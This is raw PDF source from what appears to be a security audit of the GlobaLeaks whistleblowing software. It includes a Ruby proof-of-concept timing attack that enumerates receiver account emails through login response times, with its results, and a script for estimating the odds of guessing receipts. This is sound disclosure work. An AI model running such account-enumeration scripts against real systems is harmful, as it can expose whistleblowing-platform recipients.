BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .795984 Tw (We performed an informal \(non-scientific\) experiment to get a sense for how feasible timing attacks are.) Tj T* 0 Tw .452485 Tw (The following script attempts to log in with an invalid username and password and measures the server's) Tj T* 0 Tw (response time. It can be used to tell if an email address is associated with a receiver account or not.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 672.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.741163 Tw 12 TL /F1 10 Tf 0 0 0 rg (In order to perform the experiment, we disabled the login delay by adding ) Tj /F3 10 Tf (timeout) Tj ( ) Tj (=) Tj ( ) Tj (0 ) Tj /F1 10 Tf (to the) Tj T* 0 Tw /F3 10 Tf (security_sleep\(\) ) Tj /F1 10 Tf (method in the source code, since it interferes with the attack.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 630.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .341163 Tw (The experiment was repeated 6 times. The first three runs were done using a valid account email against) Tj T* 0 Tw 1.02186 Tw (an invalid control email. The last three runs were done using one invalid account email against another) Tj T* 0 Tw (invalid account email.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 600.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.042126 Tw 12 TL /F1 10 Tf 0 0 0 rg (Tests were performed over a local \(loopback\) connection between the host system and a ) Tj /F4 10 Tf (VirtualBox) Tj T* 0 Tw /F1 10 Tf (virtual machine running ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server was restarted between each test.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 546.0236 cm
q
BT 1 0 0 1 0 38 Tm 1.810574 Tw 12 TL /F1 10 Tf 0 0 0 rg (That this experimental setup does not account for latency introduced by the Internet or Tor, and it is) Tj T* 0 Tw .458651 Tw (unreasonable to assume the attacker can restart the server between each of their tests. Therefore, these) Tj T* 0 Tw 2.274651 Tw (results only demonstrate the ) Tj /F4 10 Tf (existence ) Tj /F1 10 Tf (of a timing variation, and say nothing about the feasibility of) Tj T* 0 Tw (exploiting it in the real world.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 528.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Here are the results; the time difference is clear:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 170.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 348 re B*
Q
q
0 0 0 rg
BT 1 0 0 1 0 326 Tm /F3 10 Tf 12 TL (Valid Email \(havoc@defuse.ca\) vs. Invalid Email \(bavoc@defuse.ca\)) Tj T* (-----------------------------------------------------------------) Tj T* (Control Average: 0.004657399299999999) Tj T* (Target Average:  0.13163266159999998) Tj T* (Difference:      0.12697526229999997) Tj T*  T* (Control Average: 0.0050664069) Tj T* (Target Average:  0.1289540489) Tj T* (Difference:      0.123887642) Tj T*  T* (Control Average: 0.004537787600000001) Tj T* (Target Average:  0.138862824) Tj T* (Difference:      0.1343250364) Tj T*  T* (Invalid Email \(zavoc@defuse.ca\) vs. Invalid Email \(bavoc@defuse.ca\)) Tj T* (-------------------------------------------------------------------) Tj T*  T* (Control Average: 0.0040217026) Tj T* (Target Average:  0.004116626700000001) Tj T* (Difference:      9.492410000000104e-05) Tj T*  T* (Control Average: 0.0046012976) Tj T* (Target Average:  0.004645221) Tj T* (Difference:      4.392339999999967e-05) Tj T*  T* (Control Average: 0.005551629099999999) Tj T* (Target Average:  0.0057293925) Tj T* (Difference:      0.00017776340000000106) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 162.8236 cm
Q
 
endstream
endobj
% 'R390': class PDFStream 
390 0 obj
% page stream
<< /Length 8858 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 243.0291 cm
q
q
.789465 0 0 .789465 0 0 cm
q
1 0 0 1 6.6 8.360088 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 594 660 re B*
Q
q
BT 1 0 0 1 0 638 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (require) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('net/http') Tj 0 0 0 rg  T*  T* /F7 10 Tf .25098 .501961 .501961 rg (# NOTE: for this proof of concept to work, the exponential login delay must be) Tj /F3 10 Tf 0 0 0 rg  T* /F7 10 Tf .25098 .501961 .501961 rg (# disabled. This was done by setting timeout=0 in security_sleep\(\).) Tj /F3 10 Tf 0 0 0 rg  T*  T* /F7 10 Tf .25098 .501961 .501961 rg (# The email address you think has a receiver account.) Tj /F3 10 Tf 0 0 0 rg  T* .533333 0 0 rg (TARGET_EMAIL) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('havoc@defuse.ca') Tj 0 0 0 rg  T* /F7 10 Tf .25098 .501961 .501961 rg (# Another email address of the same length that does not have an account.) Tj /F3 10 Tf 0 0 0 rg  T* .533333 0 0 rg (CONTROL_EMAIL) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('bavoc@defuse.ca') Tj 0 0 0 rg  T*  T* /F7 10 Tf .25098 .501961 .501961 rg (# URL \(including port\) of the GlobaLeaks Node) Tj /F3 10 Tf 0 0 0 rg  T* .533333 0 0 rg (TARGET_ADDRESS) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('http://192.168.1.248:8082') Tj 0 0 0 rg  T* /F7 10 Tf .25098 .501961 .501961 rg (# XSRF Token \(get this by sniffing your own HTTP headers\)) Tj /F3 10 Tf 0 0 0 rg  T* .533333 0 0 rg (XSRF_TOKEN) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('11709ac885254109a664ef602faf5153') Tj 0 0 0 rg  T*  T* /F7 10 Tf .25098 .501961 .501961 rg (# We take 100 samples, then only keep the shortest 10.) Tj /F3 10 Tf 0 0 0 rg  T* .533333 0 0 rg (SAMPLE_SIZE) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (100) Tj 0 0 0 rg  T* .533333 0 0 rg (SUBSAMBLE_SIZE) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (10) Tj 0 0 0 rg  T*  T* /F7 10 Tf .25098 .501961 .501961 rg (# Tries to log in and measures the response time.) Tj /F3 10 Tf 0 0 0 rg  T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (measure_login_time) Tj 0 0 0 rg (\() Tj (email) Tj (,) Tj ( ) Tj (password) Tj (\)) Tj  T* (  ) Tj (uri) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (URI) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (parse) Tj (\() Tj .533333 0 0 rg (TARGET_ADDRESS) Tj 0 0 0 rg (\)) Tj  T* (  ) Tj (http) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .098039 .090196 .486275 rg (Net) Tj 0 0 0 rg (:) Tj .098039 .090196 .486275 rg (:HTTP) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (new) Tj (\() Tj (uri) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (host) Tj (,) Tj ( ) Tj (uri) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (port) Tj (\)) Tj  T* (  ) Tj (request) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .098039 .090196 .486275 rg (Net) Tj 0 0 0 rg (:) Tj .098039 .090196 .486275 rg (:HTTP) Tj .4 .4 .4 rg (::) Tj .533333 0 0 rg (Post) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (new) Tj (\() Tj .729412 .129412 .129412 rg ('/authentication') Tj 0 0 0 rg (\)) Tj  T* (  ) Tj (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (add_field) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Type') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('application/json;charset=utf-8') Tj 0 0 0 rg (\)) Tj  T* (  ) Tj (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (add_field) Tj (\() Tj .729412 .129412 .129412 rg ('X-XSRF-TOKEN') Tj 0 0 0 rg (,) Tj ( ) Tj .533333 0 0 rg (XSRF_TOKEN) Tj 0 0 0 rg (\)) Tj  T* (  ) Tj (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (add_field) Tj (\() Tj .729412 .129412 .129412 rg ('Cookie') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('XSRF-TOKEN=') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (XSRF_TOKEN) Tj 0 0 0 rg (\)) Tj  T* (  ) Tj (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (body) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("{) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (username) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (:) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (email) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (,) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (password) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (:) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (password) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (,) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (role) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (:) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (receiver) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (}") Tj 0 0 0 rg  T* (  ) Tj (start_time) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (Time) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (now) Tj  T* (  ) Tj (response) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (http) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (request) Tj (\() Tj (request) Tj (\)) Tj  T* (  ) Tj (end_time) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (Time) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (now) Tj  T* (  ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (end_time) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (start_time) Tj  T* /F6 10 Tf 0 .501961 0 rg (end) Tj /F3 10 Tf 0 0 0 rg  T*  T* (control) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg ([]) Tj 0 0 0 rg  T* (target) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg ([]) Tj 0 0 0 rg  T*  T* .533333 0 0 rg (SAMPLE_SIZE) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (times) Tj ( ) Tj /F6 10 Tf 0 .501961 0 rg (do) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg (i) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg  T* (  ) Tj (target) Tj ( ) Tj .4 .4 .4 rg (<) Tj (<) Tj 0 0 0 rg ( ) Tj (measure_login_time) Tj (\() Tj .533333 0 0 rg (TARGET_EMAIL) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('a') Tj 0 0 0 rg (\)) Tj  T* (  ) Tj (control) Tj ( ) Tj .4 .4 .4 rg (<) Tj (<) Tj 0 0 0 rg ( ) Tj (measure_login_time) Tj (\() Tj .533333 0 0 rg (CONTROL_EMAIL) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('a') Tj 0 0 0 rg (\)) Tj  T* (  ) Tj 0 .501961 0 rg (print) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (".") Tj 0 0 0 rg  T* /F6 10 Tf 0 .501961 0 rg (end) Tj /F3 10 Tf 0 0 0 rg  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("") Tj 0 0 0 rg  T*  T* /F7 10 Tf .25098 .501961 .501961 rg (# Keep only the shortest measurements. These will be the ones with the least) Tj /F3 10 Tf 0 0 0 rg  T* /F7 10 Tf .25098 .501961 .501961 rg (# amount of noise.) Tj /F3 10 Tf 0 0 0 rg  T* (control) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (sort!) Tj  T* (control_avg) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (control) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (first) Tj (\() Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (reduce) Tj (\() Tj .098039 .090196 .486275 rg (:+) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (/) Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj  T* (target) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (sort!) Tj  T* (target_avg) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (target) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (first) Tj (\() Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (reduce) Tj (\() Tj .098039 .090196 .486275 rg (:+) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (/) Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj  T*  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Control Average: ) Tj /F6 10 Tf .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (control_avg) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Target Average:  ) Tj /F6 10 Tf .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (target_avg) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Difference:      ) Tj /F6 10 Tf .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (target_avg) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (control_avg) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 235.0291 cm
Q
 
endstream
endobj
% 'R391': class PDFStream 
391 0 obj
% page stream
<< /Length 5097 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 723.0236 cm
q
BT 1 0 0 1 0 24.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix E. Computing Multiple Target Guessing) Tj T* (Success Probabilities) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 657.0236 cm
q
BT 1 0 0 1 0 50 Tm .206488 Tw 12 TL /F1 10 Tf 0 0 0 rg (The Ruby script below takes a ) Tj /F4 10 Tf (K) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (N) Tj /F1 10 Tf (, and ) Tj /F4 10 Tf (G ) Tj /F1 10 Tf (where ) Tj /F4 10 Tf (K ) Tj /F1 10 Tf (is the keyspace size \(corresponding to the number of) Tj T* 0 Tw .291654 Tw (possible receipts\), ) Tj /F4 10 Tf (N ) Tj /F1 10 Tf (is the number of targets \(corresponding to the number of existing Tips\), and ) Tj /F4 10 Tf (G ) Tj /F1 10 Tf (is the) Tj T* 0 Tw .362485 Tw (number of guesses the attacker makes. From these values, it computes the probability that the attack will) Tj T* 0 Tw .364198 Tw (succeed. The exact probability is computed by ) Tj /F4 10 Tf (1 - \(K-N choose G\) / \(K choose G\) ) Tj /F1 10 Tf (using an algorithm that) Tj T* 0 Tw (is efficient for small ) Tj /F4 10 Tf (N) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 419.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 228 re B*
Q
q
BT 1 0 0 1 0 206 Tm 12 TL /F7 10 Tf .25098 .501961 .501961 rg (# Computes \(K-N choose G\) / \(K choose G\) in O\(N\)-ish time.) Tj /F3 10 Tf 0 0 0 rg  T* (k) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (10) Tj (**) Tj (10) Tj 0 0 0 rg  T* (n) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1000) Tj 0 0 0 rg  T* (g) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (\() Tj .4 .4 .4 rg (1) Tj (.) Tj (4) Tj (*) Tj (3600) Tj (*) Tj (1000) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (floor) Tj  T*  T* (div) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg  T* (mul) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg  T*  T* (n) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (times) Tj ( ) Tj /F6 10 Tf 0 .501961 0 rg (do) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg (i) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg  T* (  ) Tj (div) Tj ( ) Tj .4 .4 .4 rg (*=) Tj 0 0 0 rg ( ) Tj (\() Tj (k) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (i) Tj (\)) Tj  T* (  ) Tj (mul) Tj ( ) Tj .4 .4 .4 rg (*=) Tj 0 0 0 rg ( ) Tj (\() Tj (k) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (g) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (i) Tj (\)) Tj  T* /F6 10 Tf 0 .501961 0 rg (end) Tj /F3 10 Tf 0 0 0 rg  T*  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Exact:") Tj 0 0 0 rg  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (\(\() Tj (mul) Tj ( ) Tj .4 .4 .4 rg (*) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1_000_000_000) Tj 0 0 0 rg (\)) Tj ( ) Tj .4 .4 .4 rg (/) Tj 0 0 0 rg ( ) Tj (div) Tj (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj ( ) Tj .4 .4 .4 rg (/) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1_000_000_000) Tj (.) Tj (0) Tj 0 0 0 rg  T*  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("1 - \(1-G/K\)^N estimate:") Tj 0 0 0 rg  T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (\() Tj .4 .4 .4 rg (1) Tj (-) Tj 0 0 0 rg (g) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj .4 .4 .4 rg (/) Tj 0 0 0 rg (k) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj (\)) Tj .4 .4 .4 rg (**) Tj 0 0 0 rg (n) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 399.8236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (To find the number of guesses to expect for a given ) Tj /F4 10 Tf (K ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (N) Tj /F1 10 Tf (, increase ) Tj /F4 10 Tf (G ) Tj /F1 10 Tf (until the result is near 0.5.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 297.8236 cm
q
BT 1 0 0 1 0 86 Tm 1.124987 Tw 12 TL /F1 10 Tf 0 0 0 rg (The formula can be explained as follows. We first compute the probability that the attack will fail. If the) Tj T* 0 Tw .987485 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node chooses ) Tj /F4 10 Tf (N ) Tj /F1 10 Tf (receipts, then the attack will fail only if the attacker guesses only receipts) Tj T* 0 Tw 1.22683 Tw (that were not chosen by ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. In other words, in order for the attack to fail, all of the attacker's) Tj T* 0 Tw .817488 Tw (guesses must be in the ) Tj /F4 10 Tf (K-N ) Tj /F1 10 Tf (receipts that are not in use. There are \(K choose G\) ways the attacker can) Tj T* 0 Tw .362485 Tw (choose their guesses, and \(K-N choose G\) ways to choose the guesses from the leftover ) Tj /F4 10 Tf (K-N) Tj /F1 10 Tf (. Therefore,) Tj T* 0 Tw .276905 Tw (assuming the attacker chooses their guesses randomly without replacement \(which is their best strategy\),) Tj T* 0 Tw 2.382093 Tw (then the probability that the attack will fail is \(K-N choose G\) divided by \(K choose G\). To get the) Tj T* 0 Tw (probability that the attack will succeed, we subtract that value from one.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 297.8236 cm
Q
 
endstream
endobj
% 'R392': class PDFPageLabels 
392 0 obj
% Document Root
<< /Nums [ 0
 393 0 R
 1
 394 0 R
 2
 395 0 R
 3
 396 0 R
 4
 397 0 R
 5
 398 0 R
 6
 399 0 R
 7
 400 0 R
 8
 401 0 R
 9
 402 0 R
 10
 403 0 R
 11
 404 0 R
 12
 405 0 R
 13
 406 0 R
 14
 407 0 R
 15
 408 0 R
 16
 409 0 R
 17
 410 0 R
 18
 411 0 R
 19
 412 0 R
 20
 413 0 R
 21
 414 0 R
 22
 415 0 R
 23
 416 0 R
 24
 417 0 R
 25
 418 0 R
 26
 419 0 R
 27
 420 0 R
 28
 421 0 R
 29
 422 0 R
 30
 423 0 R
 31
 424 0 R
 32
 425 0 R
 33
 426 0 R
 34
 427 0 R
 35
 428 0 R
 36
 429 0 R
 37
 430 0 R
 38
 431 0 R
 39
 432 0 R
 40
 433 0 R
 41
 434 0 R
 42
 435 0 R
 43
 436 0 R
 44
 437 0 R
 45
 438 0 R
 46
 439 0 R
 47
 440 0 R
 48
 441 0 R ] >>
endobj
% 'R393': class PDFPageLabel 
393 0 obj
% None
<< /S /D
 /St 1 >>
endobj
% 'R394': class PDFPageLabel 
394 0 obj
% None
<< /S /D
 /St 2 >>
endobj
% 'R395': class PDFPageLabel 
395 0 obj
% None
<< /S /D
 /St 3 >>
endobj
% 'R396': class PDFPageLabel 
396 0 obj
% None
<< /S /D
 /St 4 >>
endobj
% 'R397': class PDFPageLabel 
397 0 obj
% None
<< /S /D
 /St 5 >>
endobj
% 'R398': class PDFPageLabel 
398 0 obj
% None
<< /S /D
 /St 6 >>
endobj
% 'R399': class PDFPageLabel 
399 0 obj
% None
<< /S /D
 /St 7 >>
endobj
% 'R400': class PDFPageLabel 
400 0 obj
% None
<< /S /D
 /St 8 >>
endobj
% 'R401': class PDFPageLabel 
401 0 obj
% None
<< /S /D
 /St 9 >>
endobj
% 'R402': class PDFPageLabel 
402 0 obj
% None
<< /S /D
 /St 10 >>
endobj
% 'R403': class PDFPageLabel 
403 0 obj
% None
<< /S /D
 /St 11 >>
endobj
% 'R404': class PDFPageLabel 
404 0 obj
% None
<< /S /D
 /St 12 >>
endobj
% 'R405': class PDFPageLabel 
405 0 obj
% None
<< /S /D
 /St 13 >>
endobj
% 'R406': class PDFPageLabel 
406 0 obj
% None
<< /S /D
 /St 14 >>
endobj
% 'R407': class PDFPageLabel 
407 0 obj
% None
<< /S /D
 /St 15 >>
endobj
% 'R408': class PDFPageLabel 
408 0 obj
% None
<< /S /D
 /St 16 >>
endobj
% 'R409': class PDFPageLabel 
409 0 obj
% None
<< /S /D
 /St 17 >>
endobj
% 'R410': class PDFPageLabel 
410 0 obj
% None
<< /S /D
 /St 18 >>
endobj
% 'R411': class PDFPageLabel 
411 0 obj
% None
<< /S /D
 /St 19 >>
endobj
% 'R412': class PDFPageLabel 
412 0 obj
% None
<< /S /D
 /St 20 >>
endobj
% 'R413': class PDFPageLabel 
413 0 obj
% None
<< /S /D
 /St 21 >>
endobj
% 'R414': class PDFPageLabel 
414 0 obj
% None
<< /S /D
 /St 22 >>
endobj
% 'R415': class PDFPageLabel 
415 0 obj
% None
<< /S /D
 /St 23 >>
endobj
% 'R416': class PDFPageLabel 
416 0 obj
% None
<< /S /D
 /St 24 >>
endobj
% 'R417': class PDFPageLabel 
417 0 obj
% None
<< /S /D
 /St 25 >>
endobj
% 'R418': class PDFPageLabel 
418 0 obj
% None
<< /S /D
 /St 26 >>
endobj
% 'R419': class PDFPageLabel 
419 0 obj
% None
<< /S /D
 /St 27 >>
endobj
% 'R420': class PDFPageLabel 
420 0 obj
% None
<< /S /D
 /St 28 >>
endobj
% 'R421': class PDFPageLabel 
421 0 obj
% None
<< /S /D
 /St 29 >>
endobj
% 'R422': class PDFPageLabel 
422 0 obj
% None
<< /S /D
 /St 30 >>
endobj
% 'R423': class PDFPageLabel 
423 0 obj
% None
<< /S /D
 /St 31 >>
endobj
% 'R424': class PDFPageLabel 
424 0 obj
% None
<< /S /D
 /St 32 >>
endobj
% 'R425': class PDFPageLabel 
425 0 obj
% None
<< /S /D
 /St 33 >>
endobj
% 'R426': class PDFPageLabel 
426 0 obj
% None
<< /S /D
 /St 34 >>
endobj
% 'R427': class PDFPageLabel 
427 0 obj
% None
<< /S /D
 /St 35 >>
endobj
% 'R428': class PDFPageLabel 
428 0 obj
% None
<< /S /D
 /St 36 >>
endobj
% 'R429': class PDFPageLabel 
429 0 obj
% None
<< /S /D
 /St 37 >>
endobj
% 'R430': class PDFPageLabel 
430 0 obj
% None
<< /S /D
 /St 38 >>
endobj
% 'R431': class PDFPageLabel 
431 0 obj
% None
<< /S /D
 /St 39 >>
endobj
% 'R432': class PDFPageLabel 
432 0 obj
% None
<< /S /D
 /St 40 >>
endobj
% 'R433': class PDFPageLabel 
433 0 obj
% None
<< /S /D
 /St 41 >>
endobj
% 'R434': class PDFPageLabel 
434 0 obj
% None
<< /S /D
 /St 42 >>
endobj
% 'R435': class PDFPageLabel 
435 0 obj
% None
<< /S /D
 /St 43 >>
endobj
% 'R436': class PDFPageLabel 
436 0 obj
% None
<< /S /D
 /St 44 >>
endobj
% 'R437': class PDFPageLabel 
437 0 obj
% None
<< /S /D
 /St 45 >>
endobj
% 'R438': class PDFPageLabel 
438 0 obj
% None
<< /S /D
 /St 46 >>
endobj
% 'R439': class PDFPageLabel 
439 0 obj
% None
<< /S /D
 /St 47 >>
endobj
% 'R440': class PDFPageLabel 
440 0 obj
% None
<< /S /D
 /St 48 >>
endobj
% 'R441': class PDFPageLabel 
441 0 obj
% None
<< /S /D
 /St 49 >>
endobj
xref
0 442
0000000000 65535 f
0000000113 00000 n
0000000304 00000 n
0000000469 00000 n
